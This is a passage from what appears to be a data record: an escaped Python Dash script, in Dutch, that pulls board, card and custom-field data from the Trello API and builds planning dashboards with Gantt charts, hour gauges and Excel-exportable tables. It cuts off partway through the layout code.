"step-5": "import os, json, locale, requests, dash, dash_table, copy, time, flask, base64\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objects as go\nimport pandas as pd\nfrom os import listdir\nimport plotly.figure_factory as ff\nfrom concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor\nfrom dash.dependencies import Input, Output\nfrom datetime import date,datetime,timedelta,time\nfrom dateutil.relativedelta import relativedelta\n \n#--! Check if app is deployed\ntry:\n with open('./configuration/credentials.txt') as json_file:\n credentials = json.load(json_file)\n with open('./configuration/configuration.txt') as json_file:\n config = json.load(json_file)\nexcept:\n raise Exception('Draai eerst deploy.py!')\n \n#--! Set locale\nlocale = locale.setlocale(locale.LC_ALL, 'nl_NL.UTF-8')\n\n#--! Set all global variables\nglobals = {'config': config, 'credentials': credentials, 'styles': {}}\nboard_url = 'https://api.trello.com/1/members/me/boards?fields=name&key='+credentials.get('API key')+ \"&token=\"+credentials.get('API token')\nboards = json.loads(json.dumps(requests.get(board_url).json()))\nglobals['boards'] = boards\nglobals['styles']['maindivs'] = {'box-shadow': '8px 8px 8px grey',\n 'background-image': \"\"\"url('./assets/left.png')\"\"\",\n 'background-repeat': 'no-repeat',\n 'background-position': '0px 0px',\n 'margin-top': '1%', \n 'margin-bottom': '1%', \n 'margin-left': '1%',\n 'margin-right': '1%',\n 'text-align': 'center',\n 'border-radius': '10px' \n }\nglobals['styles']['tabs'] = {'border-style': 'solid',\n 'border-width': '2px',\n 'background': 'rgb(255,255,255)',\n 'background': 'radial-gradient(circle, rgba(255,255,255,1) 0%, rgba(162,162,162,1) 100%, rgba(255,255,255,1) 100%)',\n 'margin-top': '5px', \n 'margin-bottom': '5px', \n 'margin-right': '5px', \n 'margin-left': '5px',\n 'border-radius': '6px'\n }\nglobals['styles']['divgraphs'] = {'background-color': 'rgba(62,182,235,0.1)',\n 'margin-top': '1%', \n 'margin-bottom': '2%', \n 'margin-left': '1%',\n 'margin-right': '1%',\n 'text-align': 'center',\n 'border-radius': '10px' \n }\nglobals['styles']['dropdowns'] = {'margin-left': '1%', 'margin-right': '2%'}\n\nglobals['graphlayouts']= {'bars': go.Layout(barmode='stack', paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)', hovermode='closest')}\n\n#--! Create function to refresh data\n\ndef get_data(value):\n # set data variable to global to use in other functions\n global data\n global config\n with open('./configuration/configuration.txt') as json_file:\n configfile = json.load(json_file)\n config = configfile.get(value)\n # set all url variables\n keys = \"key=\"+credentials.get('API key')+\"&token=\"+credentials.get('API token')\n trello_base_url = \"https://api.trello.com/1/\"\n board_url = trello_base_url+\"boards/\"+ value \n #board_url = trello_base_url+\"boards/\"+ config.get('Board ID')\n url_cards = board_url+\"?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&\"+keys\n url_lists = board_url+\"/lists?filter=all&\"+keys\n url_customfields = board_url+\"/customFields?\"+keys\n url_labels = board_url+\"/labels?\"+keys\n url_members = board_url+\"/members?\"+keys\n \n # get JSON\n board = json.loads(json.dumps(requests.get(url_cards).json()))\n lists = json.loads(json.dumps(requests.get(url_lists).json()))\n customfields = json.loads(json.dumps(requests.get(url_customfields).json()))\n labels = json.loads(json.dumps(requests.get(url_labels).json()))\n members = json.loads(json.dumps(requests.get(url_members).json()))\n cards = board['cards']\n \n # create function to convert Trello date to datetime\n def dateCalc(date):\n try:\n newdate = datetime.strptime(date[0:19],'%Y-%m-%dT%H:%M:%S')\n return newdate\n except:\n return None\n \n # create dict for custom fields\n customfields_dict = {'date': {},'list': {}, 'text': {}, 'number': {}, 'checkbox': {}}\n for i in customfields:\n customfields_dict[i['type']] = {}\n for i in customfields:\n customfields_dict[i['type']][i['id']] = {}\n for i in customfields:\n if i['type'] == 'list':\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n customfields_dict['list'][i['id']]['options'] = {}\n for j in i['options']:\n customfields_dict['list'][i['id']]['options'][j['id']] = j['value'].get('text')\n else:\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n \n # collect all chosen lists\n chosenlists = []\n for i in config.get('Not Started'):\n chosenlists.append(i)\n chosenlists.extend(config.get('Blocked'))\n chosenlists.extend(config.get('Doing'))\n chosenlists.extend(config.get('Done'))\n for i in config.get('Epics'):\n chosenlists.append(i)\n for i in config.get('Always continuing'):\n chosenlists.append(i)\n for i in config.get('List with Epics Done'):\n chosenlists.append(i)\n \n # create function to convert cardid to datetime\n def idtodate(cardid):\n hex = cardid[0:8]\n timestamp = int(hex,16)\n timedate = datetime.fromtimestamp(timestamp)\n return timedate \n\n # create function to get the epic id from the attachment-urls\n def get_epicid(url):\n try:\n if 'epicId=' in url:\n start = url.find('epicId=')+7\n end = url.find('&attachmentId=')\n return url[start:end]\n else:\n pass\n except:\n pass\n\n # create dict for cards\n kaarten = {i['id']: {'Naam': i['name'],\n 'KaartID': i['id'],\n 'ListID': i['idList'],\n 'customfields': i['customFieldItems'],\n 'Aangemaakt': idtodate(i['id']),\n 'labels': [label['name'] for label in i['labels'] if i['labels'] != []],\n 'members': [member['fullName'] for member in members if member['id'] in i['idMembers']],\n 'Sjabloon': i['isTemplate'],\n 'Vervaldatum': dateCalc(i['due']),\n 'Gearchiveerd': i['closed'],\n 'epicid': [get_epicid(j['url']) for j in i['attachments']],\n 'Epic': None,\n 'shortUrl': i['shortUrl']\n } for i in cards}\n \n # remove all attachments except epic-attachments, plus add all members in one string field\n for i,j in kaarten.items():\n while None in j['epicid']:\n j['epicid'].remove(None)\n if j['members'] != []:\n j['Leden'] = ''\n for k in j['members']:\n if j['Leden'] == '':\n j['Leden'] += k\n else:\n j['Leden'] += ', '+ k \n else:\n j['Leden'] = None\n del j['members']\n\n # add the custom fields to cards-dict\n if customfields_dict != {}:\n for i,j in customfields_dict.items():\n for k,l in j.items():\n for m,n in kaarten.items():\n n[l['name']] = None\n for i,j in kaarten.items():\n for k in j['customfields']:\n if k['idCustomField'] in customfields_dict['list'].keys():\n j[customfields_dict['list'][k['idCustomField']].get('name')] = customfields_dict['list'][k['idCustomField']]['options'].get(k['idValue'])\n elif k['idCustomField'] in customfields_dict['checkbox'].keys():\n if k['value']['checked'] == 'true':\n j[customfields_dict['checkbox'][k['idCustomField']].get('name')] = True\n else:\n j[customfields_dict['checkbox'][k['idCustomField']].get('name')] = False\n elif k['idCustomField'] in customfields_dict['date'].keys():\n j[customfields_dict['date'][k['idCustomField']].get('name')] = dateCalc(k['value'].get('date')) \n else:\n for key in k['value']:\n j[customfields_dict[key][k['idCustomField']].get('name')] = k['value'].get(key)\n \n # add epicname\n epicIdNameCategory = []\n for i,j in kaarten.items():\n epicIdNameCategory.append((i,j['Naam'],j[config.get('Custom Field for Categories')])) \n for i,j in kaarten.items():\n if j['epicid'] == []:\n j['Epic'] = 'Geen epic'\n j['Categorie'] = None\n else:\n for k in epicIdNameCategory:\n if k[0] == j['epicid'][0]:\n j['Epic'] = k[1]\n j['Categorie'] = k[2]\n del j['epicid']\n\n # add listname and status\n for i,j in kaarten.items():\n for k in lists:\n if j['ListID'] == k['id']: j['Lijst'] = k['name']\n if j['Lijst'] in config.get('Not Started'):\n j['Status'] = 'Niet gestart'\n elif j['Lijst'] in config.get('Doing'):\n j['Status'] = 'Doing'\n elif j['Lijst'] in config.get('Blocked'):\n j['Status'] = 'Blocked'\n elif j['Lijst'] in config.get('Done'):\n j['Status'] = 'Done'\n elif j['Lijst'] in config.get('Always continuing'):\n j['Status'] = 'Doorlopend'\n elif j['Lijst'] in config.get('Epics'):\n j['Status'] = 'Epics Doing'\n elif j['Lijst'] in config.get('List with Epics Done'):\n j['Status'] = 'Epics Done'\n else:\n j['Status'] = 'Archived'\n del j['customfields']\n del j['ListID']\n for i,j in kaarten.items():\n if j['Gearchiveerd'] == True and j['Status'] != 'Done':\n j['Status'] = 'Archived'\n\n # collect all lists with cards to delete\n liststodelete = []\n for i in lists:\n if i['name'] not in chosenlists:\n liststodelete.append(i['name'])\n\n # collect all cards to delete\n cardstodelete = []\n for i,j in kaarten.items():\n if j['Sjabloon'] == True:\n cardstodelete.append(i)\n elif j['Lijst'] in liststodelete:\n cardstodelete.append(i)\n \n # create hours-dict for available hours\n hours = {}\n for i,j in kaarten.items():\n if j['Lijst'] == config.get('List for hours'):\n hours[j['Naam']] = {config['Custom Field for Starting date']: j[config['Custom Field for Starting date']], config['Custom Field for Ending date']: j[config['Custom Field for Ending date']], config['Custom Field with hours']: j[config['Custom Field with hours']]}\n\n # delete previously collected cards\n for i in cardstodelete:\n if i in kaarten:\n del kaarten[i]\n\n # create list with all dates (6 months history, 1yr in advance)\n tmpdatesdict = {}\n now = datetime.now().date()\n numdays = 365\n numdayshistory = 183\n\n for x in range (0, numdays):\n tmpdatesdict[str(now + timedelta(days = x))] = {}\n for x in range (0,numdayshistory):\n tmpdatesdict[str(now - timedelta(days = x))] = {}\n\n dates = []\n for i in sorted(tmpdatesdict):\n dates.append(i) \n \n # create some global arrays for later use\n arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten.values()])), \n 'xaxis_months': list(dict.fromkeys([i[0:4]+\"-\"+i[5:7]+\"-01\" for i in dates])), \n 'perioden': list(dict.fromkeys([i[0:4]+i[5:7] for i in dates])),\n 'statuses': list(dict.fromkeys([card['Status'] for card in kaarten.values()])), \n config.get('Custom Field for Categories'): list(dict.fromkeys([card[config.get('Custom Field for Categories')] for card in kaarten.values()])),\n config.get('Custom Field for Person'): list(dict.fromkeys([card[config.get('Custom Field for Person')] if card[config.get('Custom Field for Person')] != None else 'Geen ' + config.get('Custom Field for Person') for card in kaarten.values() ])),\n \n }\n \n # create dict to calculate the hours per day for each card \n try:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'],\n 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'],\n 'shortUrl': kaart['shortUrl'],\n config.get('Custom Field for Starting date'): kaart[config.get('Custom Field for Starting date')],\n config.get('Custom Field for Ending date'): kaart[config.get('Custom Field for Ending date')],\n 'Gebied': kaart['Gebied'],\n config.get('Custom Field for Person'): kaart[config.get('Custom Field for Person')],\n config.get('Custom Field for Categories'): kaart[config.get('Custom Field for Categories')],\n config.get('Custom Field with hours'): kaart[config.get('Custom Field with hours')],\n 'Cognosrapport': kaart['Cognosrapport'],\n 'Niet meenemen in telling': kaart['Niet meenemen in telling'],\n 'Lijst': kaart['Lijst'],\n 'Status': kaart['Status'],\n 'urenperdag': {i:0 for i in dates},\n 'urenperperiode': {i:0 for i in arrays['perioden']}} \n\n for kaart in kaarten.values()}\n except:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'],\n 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'],\n 'shortUrl': kaart['shortUrl'],\n config.get('Custom Field for Starting date'): kaart[config.get('Custom Field for Starting date')],\n config.get('Custom Field for Ending date'): kaart[config.get('Custom Field for Ending date')],\n config.get('Custom Field for Person'): kaart[config.get('Custom Field for Person')],\n config.get('Custom Field for Categories'): kaart[config.get('Custom Field for Categories')],\n config.get('Custom Field with hours'): kaart[config.get('Custom Field with hours')],\n 'Lijst': kaart['Lijst'], \n 'Status': kaart['Status'],\n 'urenperdag': {i:0 for i in dates},\n 'urenperperiode': {i:0 for i in arrays['perioden']}} \n\n for kaart in kaarten.values()}\n \n # do the same for available hours \n beschikbareuren = {key: {'urenperdag': {i:0 for i in dates},\n 'urenperperiode': {i:0 for i in arrays['perioden']}}\n for key in hours.keys()}\n for i in dates:\n datekey = datetime.strptime(i,'%Y-%m-%d').date()\n for k,l in kaarten.items():\n if l['Niet meenemen in telling'] != True:\n try:\n if l[config.get('Custom Field for Starting date')].date() < datekey <= l[config.get('Custom Field for Ending date')].date():\n delta = l[config.get('Custom Field for Ending date')] - l[config.get('Custom Field for Starting date')]\n hoursperday = int(l[config.get('Custom Field with hours')])/int(delta.days) \n urenperdagperkaart[l['Naam']]['urenperdag'][i] = hoursperday\n except:\n pass\n for k,l in hours.items():\n try:\n if l[config.get('Custom Field for Starting date')].date() < datekey <= l[config.get('Custom Field for Ending date')].date():\n hoursperday = int(l[config.get('Custom Field with hours')])/int(30.4) \n beschikbareuren[k]['urenperdag'][i] = hoursperday\n except:\n pass\n \n # calculate the hours per month with the hours per day for each card\n for i,j in urenperdagperkaart.items():\n for k,l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m==k[0:4]+k[5:7]:\n j['urenperperiode'][m] += l\n\n \n # do the same for available hours \n for i,j in beschikbareuren.items():\n for k,l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m==k[0:4]+k[5:7]:\n j['urenperperiode'][m] += l\n\n \n # create data for a dataframe with the hours per month\n dfurenpermaand = copy.deepcopy(urenperdagperkaart)\n for i,j in dfurenpermaand.items():\n try:\n j['Geplande uren'] = int(j['Geplande uren'])\n except:\n j['Geplande uren'] = 0\n for k,l in j['urenperperiode'].items():\n j[k] = round(l,2)\n del j['urenperperiode']\n \n # create a bar chart with all cards with no begin and end date\n bars = []\n labelsnietingepland = []\n for j in kaarten.values():\n if j[config.get('Custom Field for Starting date')] == None and j[config.get('Custom Field for Ending date')] == None and j[config.get('Custom Field with hours')] !=None and j['Status'] == 'Niet gestart':\n labelsnietingepland.append(j['Lijst'])\n labelsnietingepland = list(dict.fromkeys(labelsnietingepland))\n for i,j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config.get('Custom Field for Ending date')] == None and j[config.get('Custom Field with hours')] !=None and j['Status'] == 'Niet gestart':\n tmp = []\n for label in labelsnietingepland:\n if j['Lijst'] == label:\n tmp.append(int(j['Geplande uren']))\n else:\n tmp.append(0)\n bars.append(dict(x=labelsnietingepland,\n y=tmp,\n name=j['Naam'],\n type='bar',\n opacity='0.6')) \n \n # create a bar chart with all cards with no begin and end date per epic \n epicbars = []\n tmpepicsforbarchart = {epic: 0 for epic in [name['Naam'] for name in kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}\n tmpepicsforbarchart['Geen epic'] = 0\n for i,j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config.get('Custom Field for Ending date')] == None and j[config.get('Custom Field with hours')] !=None and j['Status'] == 'Niet gestart':\n tmpepicsforbarchart[j['Epic']] += int(j[config.get('Custom Field with hours')])\n\n epicsforbarchart = { k:v for k,v in tmpepicsforbarchart.items() if v!=0 }\n\n epicbars.append(dict(x=[key for key in epicsforbarchart.keys()],\n y=[value for value in epicsforbarchart.values()],\n type='bar',\n text=[value for value in epicsforbarchart.values()],\n textposition='outside',\n opacity='0.6'))\n\n # create figure for gauge (planned vs available hours)\n thismonth = datetime.strftime(datetime.now(), '%Y%m')\n nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')\n twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')\n \n arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,'%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,'%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,'%Y%m').strftime('%B'))]\n \n \n gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart.values() for keys,value in card['urenperperiode'].items() if keys==thismonth]))\n gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart.values() for keys,value in card['urenperperiode'].items() if keys==nextmonth]))\n gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart.values() for keys,value in card['urenperperiode'].items() if keys==twomonths]))\n\n deltathismonth = round(sum([value for card in beschikbareuren.values() for keys,value in card['urenperperiode'].items() if keys==thismonth]))\n deltanextmonth = round(sum([value for card in beschikbareuren.values() for keys,value in card['urenperperiode'].items() if keys==nextmonth]))\n deltatwomonths = round(sum([value for card in beschikbareuren.values() for keys,value in card['urenperperiode'].items() if keys==twomonths]))\n\n if deltathismonth > gaugegeplandthismonth:\n gaugerangethismonth = deltathismonth + 20\n else:\n gaugerangethismonth = gaugegeplandthismonth + 20\n\n if deltanextmonth > gaugegeplandnextmonth:\n gaugerangenextmonth = deltanextmonth + 20\n else:\n gaugerangenextmonth = gaugegeplandnextmonth + 20\n\n if deltatwomonths > gaugegeplandtwomonths:\n gaugerangetwomonths = deltatwomonths + 20\n else:\n gaugerangetwomonths = gaugegeplandtwomonths + 20\n\n gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},\n 'bar': {'color': '#3eb6eb'},\n 'steps': [\n {'range': [0, deltathismonth*0.5], 'color': '#3deb34'},\n {'range': [deltathismonth*0.5, deltathismonth*0.75], 'color': '#b4eb34'},\n {'range': [deltathismonth*0.75, deltathismonth*0.9], 'color': '#ebb434'},\n {'range': [deltathismonth*0.9, deltathismonth], 'color': '#eb6e34'},\n {'range': [deltathismonth,gaugerangethismonth], 'color': '#eb3434'},\n ],\n 'threshold': {'line': {'color': \"#5c0000\", 'width': 4}, 'thickness': 0.75, 'value': deltathismonth}\n }\n gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},\n 'bar': {'color': '#3eb6eb'},\n 'steps': [\n {'range': [0, deltanextmonth*0.5], 'color': '#3deb34'},\n {'range': [deltanextmonth*0.5, deltanextmonth*0.75], 'color': '#b4eb34'},\n {'range': [deltanextmonth*0.75, deltanextmonth*0.9], 'color': '#ebb434'},\n {'range': [deltanextmonth*0.9, deltanextmonth], 'color': '#eb6e34'},\n {'range': [deltanextmonth,gaugerangenextmonth], 'color': '#eb3434'},\n ],\n 'threshold': {'line': {'color': \"#5c0000\", 'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}\n } \n gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},\n 'bar': {'color': '#3eb6eb'},\n 'steps': [\n {'range': [0, deltatwomonths*0.5], 'color': '#3deb34'},\n {'range': [deltatwomonths*0.5, deltatwomonths*0.75], 'color': '#b4eb34'},\n {'range': [deltatwomonths*0.75, deltatwomonths*0.9], 'color': '#ebb434'},\n {'range': [deltatwomonths*0.9, deltatwomonths], 'color': '#eb6e34'},\n {'range': [deltatwomonths,gaugerangetwomonths], 'color': '#eb3434'},\n ],\n 'threshold': {'line': {'color': \"#5c0000\", 'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}\n } \n gaugefig = go.Figure()\n\n gaugefig.add_trace(go.Indicator(\n domain = {'x': [0, 0.3], 'y': [0, 1]},\n value = gaugegeplandthismonth,\n mode = \"gauge+number+delta\",\n title = {'text': \"Totale uren voor \" + datetime.strptime(thismonth,'%Y%m').strftime('%B')},\n delta = {'reference': deltathismonth},\n gauge = gaugestepsthismonth\n ))\n gaugefig.add_trace(go.Indicator(\n domain = {'x': [0.35, 0.65], 'y': [0, 1]},\n value = gaugegeplandnextmonth,\n mode = \"gauge+number+delta\",\n title = {'text': \"Totale uren voor \" + datetime.strptime(nextmonth,'%Y%m').strftime('%B')},\n delta = {'reference': deltanextmonth},\n gauge = gaugestepsnextmonth\n )) \n gaugefig.add_trace(go.Indicator(\n domain = {'x': [0.7, 1], 'y': [0, 1]},\n value = gaugegeplandtwomonths,\n mode = \"gauge+number+delta\",\n title = {'text': \"Totale uren voor \" + datetime.strptime(twomonths,'%Y%m').strftime('%B')},\n delta = {'reference': deltatwomonths},\n gauge = gaugestepstwomonths\n )) \n\n gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)', \n plot_bgcolor='rgba(0,0,0,0)',)\n\n\n\n\n graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars, 'gaugefig': gaugefig}\n \n columntypes = {}\n for key, value in kaarten[next(iter(kaarten))].items():\n if 'datum' in key or key == 'Aangemaakt':\n columntypes[key] = 'datetime'\n elif type(value) == int:\n columntypes[key] = 'numeric'\n elif type(value in [str,bool]):\n columntypes[key] = 'text'\n \n columntypesurenpermaand = dict(columntypes)\n \n columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})\n \n data = {'kaarten': kaarten, \n 'arrays': arrays,\n 'urenperdagperkaart': urenperdagperkaart,\n 'beschikbareuren': beschikbareuren,\n 'graphdata': graphdata,\n 'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,\n 'columntypes': columntypes,\n 'urenpermaand': pd.DataFrame(data=dfurenpermaand).T,\n 'columntypesurenpermaand': columntypesurenpermaand\n \n }\n \n }\n \n#--! Create layout function. Only create a simple layout with a few components. The rest will be loaded using callbacks.\ndef make_layout():\n return html.Div(\n className='First Div',\n \n children=[\n html.Div(\n style={\n 'font-style': 'italic',\n 'font-weight': 'bold',\n 'border': '10px', \n 'box-shadow': '8px 8px 8px grey',\n 'background': 'rgb(149,193,31)',\n 'background': 'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)',\n 'margin-top': '1%', \n 'margin-bottom': '1%', \n 'margin-right': '1%', \n 'margin-left': '1%',\n 'border-radius': '10px',\n 'text-align': 'center'\n },\n className='Banner',\n children=[\n html.Div(\n style={'display': 'inline-block', 'width': '80%'},\n children=[\n html.H1('Trello borden USD'),\n ]\n ),\n html.Div(\n style={'display': 'inline-block', 'margin-right': '1px'},\n children=[\n html.Img(src=app.get_asset_url('logonop.png'), style={'width': '150px','margin-right': '0px'})\n ]\n )\n ]\n ),\n\n\n html.H5('Kies hieronder een bord', style={'text-align': 'center'}),\n dcc.Dropdown(\n id='dropdown_boards',\n options=[{'label': i['name'], 'value': i['id']} for i in boards],\n value = boards[0]['id'],\n ),\n\n\n html.Button('Data verversen', id='refreshdatabtn', n_clicks=0),\n html.Div(\n id='test'\n )\n ]\n )#/firstdiv \n \n#--! Get CSS files and scripts and set App (including layout) \nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\nexternal_scripts = ['https://cdn.plot.ly/plotly-locale-nl-latest.js']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets,external_scripts=external_scripts, url_base_pathname='/dash/')\napp.layout = make_layout\n#--! Set Dash to suppress callback exceptions, because some callbacks can only be made when the first callback in the main layout has been made.\napp.config['suppress_callback_exceptions'] = True\n\n\n\n#--! Define app callbacks\n\n#---! dropdown_boards\n # This function should be changed when more boards are added. For now, only Werkvoorraad is compatible.\n@app.callback(Output('test', 'children'),\n [Input('dropdown_boards', 'value'),\n Input('refreshdatabtn', 'n_clicks')]\n )\ndef create_maindiv(value, n_clicks):\n # first retrieve all data\n get_data(value)\n\n import os\n if os.name=='nt':\n daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')\n else:\n daterefreshed = datetime.strftime(datetime.now(),'%A %-d %B, %H:%M')\n # Return all other divs\n return html.Div(\n className='', \n children=[\n # Show date of refresh\n dcc.Markdown('''**Laatst ververst: **''' + daterefreshed),\n # Create tabs\n dcc.Tabs(\n className='Tabs', \n children=[\n # Create first tab\n \n dcc.Tab(\n label='Gantt charts',\n style=globals['styles']['tabs'], \n children=[\n html.Div(\n className='tab2_div1',\n style=globals['styles']['maindivs'],\n children=[\n html.H3('Uitleg'),\n html.Div(\n style=globals['styles']['divgraphs'],\n children=[ \n dcc.Markdown('''In dit tabblad worden de kaarten in GANTT charts weergegeven. Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.'''),\n ]\n ),\n ]\n ), \n html.Div(\n className='tab2_div2',\n style=globals['styles']['maindivs'],\n children=[\n html.H4('Gantt per epic'),\n dcc.Dropdown(\n style = globals['styles']['dropdowns'],\n id='dropdownganttepics',\n options=[{'label':name, 'value':name} for name in data['arrays']['epics']],\n value = [next(iter(data['arrays']['epics']))]\n ),\n html.Div(\n style=globals['styles']['divgraphs'],\n children=[ \n dcc.Graph(id='ganttepics'),\n ]\n ),\n ]\n ),\n html.Div(\n className='tab2_div3',\n style=globals['styles']['maindivs'],\n children=[\n html.H4('Gantt per persoon'),\n dcc.Dropdown(\n style = globals['styles']['dropdowns'],\n id='dropdownganttpersoon',\n options=[{'label':name, 'value':name} for name in data['arrays'][config.get('Custom Field for Person')]],\n ),\n dcc.Dropdown(\n style = globals['styles']['dropdowns'],\n id='dropdownganttpersoonstatus',\n options=[{'label':name, 'value':name} for name in data['arrays']['statuses']],\n value = data['arrays']['statuses'],\n multi=True,\n ),\n \n html.Div(\n style=globals['styles']['divgraphs'],\n children=[ \n dcc.Graph(id='ganttpersoon'),\n ]\n ),\n ]\n ), \n ]\n ),\n dcc.Tab(\n label='Data export',\n style=globals['styles']['tabs'], \n children=[\n html.Div(\n className='tab3_div1',\n style=globals['styles']['maindivs'],\n children=[\n html.H3('Uitleg'),\n html.Div(\n style=globals['styles']['divgraphs'],\n children=[ \n dcc.Markdown('''Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand.'''),\n dcc.Markdown('''In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. Kies dan de velden, filter daarna en klik op 'Export'.'''),\n ]\n ),\n ]\n ), \n html.Div(\n className='tab3_div2',\n style=globals['styles']['maindivs'],\n children=[\n html.H4('Platte dump'),\n dcc.Markdown('Deze tabel laat de platte data zien, zoals in Trello gevuld.'),\n dash_table.DataTable(\n id='table_plattedump',\n \n columns=[{'name': i, 'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable': True} for i in data['dfs']['kaartendf'].columns if i in data['dfs']['columntypes'].keys()],\n data=data['dfs']['kaartendf'].to_dict('records'),\n hidden_columns=[i for i in data['dfs']['columntypes']],\n export_format='xlsx',\n export_headers='display',\n export_columns='all',\n filter_action=\"native\",\n sort_action=\"native\",\n sort_mode=\"multi\", \n style_table={'overflowX': 'scroll'},\n style_header={'backgroundColor': 'rgba(62,182,235,0.6)','color': 'black', 'fontWeight': 'bold', 'fontFamily': 'Arial'},\n style_cell = {'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black','text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'}, \n )\n\n ]\n ),\n html.Div(\n className='tab3_div3',\n style=globals['styles']['maindivs'],\n children=[\n html.H4('Uren per maand'),\n \n dcc.Markdown('Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'),\n dcc.Markdown('Ook hierin kan gefilterd worden. filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'), \n dash_table.DataTable(\n id='table_urenpermaand',\n columns=[{'name': i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i), 'hideable': True} for i in data['dfs']['urenpermaand'].columns if i in data['dfs']['columntypesurenpermaand'].keys()],\n data=data['dfs']['urenpermaand'].to_dict('records'),\n hidden_columns=[i for i in data['dfs']['columntypesurenpermaand']],\n export_format='xlsx',\n export_headers='display',\n export_columns='all',\n filter_action=\"native\",\n sort_action=\"native\",\n sort_mode=\"multi\", \n style_header={'backgroundColor': 'rgba(62,182,235,0.6)','color': 'black', 'fontWeight': 'bold', 'fontFamily': 'Arial'},\n style_cell = {'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black','text-align': 'left', 'fontFamily': 'Arial'}, \n )\n\n\n ]\n ), \n ]\n ),\n dcc.Tab(\n label='Langetermijnplanning',\n style=globals['styles']['tabs'], \n children=[\n html.Div(\n className='maindivs',\n style=globals['styles']['maindivs'],\n children=[\n html.H3('Uitleg'),\n html.Div(\n style=globals['styles']['divgraphs'],\n children=[ \n dcc.Markdown('''In dit tabblad wordt een langetermijnplanning getoond.'''),\n dcc.Markdown('''De focus hierbij ligt vooral op de categorieen.'''),\n ]\n ),\n ]\n ), \n html.Div(\n className='maindivs',\n style=globals['styles']['maindivs'],\n children=[\n html.H4('Ingeplande uren per categorie'),\n dcc.Dropdown(\n style = globals['styles']['dropdowns'],\n id='dropdownurenpermaand',\n options=[{'label':name, 'value':name} for name in data['arrays'][config.get('Custom Field for Categories')] if name != None],\n multi=True,\n searchable=False,\n value = data['arrays'][config.get('Custom Field for Categories')]\n ),\n html.Div(\n style=globals['styles']['divgraphs'],\n children=[ \n dcc.Graph(id='urenpermaand')\n ]\n ),\n ]\n ),\n html.Div(\n className='tab1_div3',\n style=globals['styles']['maindivs'],\n children=[\n html.H4('Nog in te plannen uren (per lijst)'),\n dcc.Markdown('''*Nieuw* zijn werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'''),\n dcc.Markdown('''*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'''),\n dcc.Markdown('''*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'''),\n dcc.Markdown('''**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'''), \n html.Div(\n style=globals['styles']['divgraphs'],\n children=[\n dcc.Graph(\n id='graph_nietingepland',\n figure={'data': data['graphdata']['nietingepland'],\n 'layout': globals['graphlayouts']['bars']} \n )\n ]\n ),\n ]\n ), \n html.Div(\n className='tab1_div4',\n style=globals['styles']['maindivs'],\n children=[\n html.H4('Nog in te plannen uren (per epic)'),\n dcc.Markdown('''**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'''), \n html.Div(\n style=globals['styles']['divgraphs'],\n children=[ \n dcc.Graph(\n id='graph_nietingepland_epics',\n figure={'data': data['graphdata']['nietingeplandepics'],\n 'layout': globals['graphlayouts']['bars']}\n ) \n ]\n ),\n ]\n ), \n ]\n ), \n dcc.Tab(\n style=globals['styles']['tabs'], \n label='Tactische planning',\n children=[\n html.Div(\n className='maindivs',\n style=globals['styles']['maindivs'], \n children=[\n html.H3('Uitleg'),\n dcc.Markdown('''In dit tabblad is een middellange termijnplanning te zien.'''),\n\n ]\n ),\n html.Div(\n className='maindivs',\n style=globals['styles']['maindivs'], \n children=[\n html.H4('Totalen'),\n 